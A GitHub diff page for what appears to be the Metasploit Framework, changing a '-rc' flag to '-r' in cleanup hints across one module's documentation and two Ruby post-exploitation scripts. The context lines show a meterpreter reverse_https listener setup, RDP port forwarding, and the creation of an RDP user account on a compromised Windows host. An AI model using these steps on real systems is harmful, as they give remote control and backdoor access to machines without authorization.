File tree Expand file tree Collapse file tree 3 files changed +3
-3
lines changed
documentation/modules/post/windows/manage Expand file tree Collapse file tree 3 files changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -56,7 +56,7 @@ set PAYLOAD windows/meterpreter/reverse_https
56
56
set LHOST 192.168.1.101
57
57
set LPORT 13002
58
58
set ExitOnSession false
59
- set AutoRunScript multi_console_command -rc /home/user/auto.rc
59
+ set AutoRunScript multi_console_command -r /home/user/auto.rc
60
60
exploit -j
61
61
```
62
62
Original file line number Diff line number Diff line change @@ -176,7 +176,7 @@ def message
176
176
print_status ( "Starting the port forwarding at local port #{ lport } " )
177
177
client . run_cmd ( "portfwd add -L 0.0.0.0 -l #{ lport } -p 3389 -r 127.0.0.1" )
178
178
end
179
- print_status ( "For cleanup use command: run multi_console_command -rc #{ @dest } " )
179
+ print_status ( "For cleanup use command: run multi_console_command -r #{ @dest } " )
180
180
else
181
181
usage
182
182
end
Original file line number Diff line number Diff line change @@ -166,7 +166,7 @@ def unsupported
166
166
if ( usr != nil && pass != nil )
167
167
addrdpusr ( usr , pass )
168
168
end
169
- print_status ( "For cleanup use command: run multi_console_command -rc #{ @dest } " )
169
+ print_status ( "For cleanup use command: run multi_console_command -r #{ @dest } " )
170
170
171
171
else
172
172
usage
You can’t perform that action at this time.
0 commit comments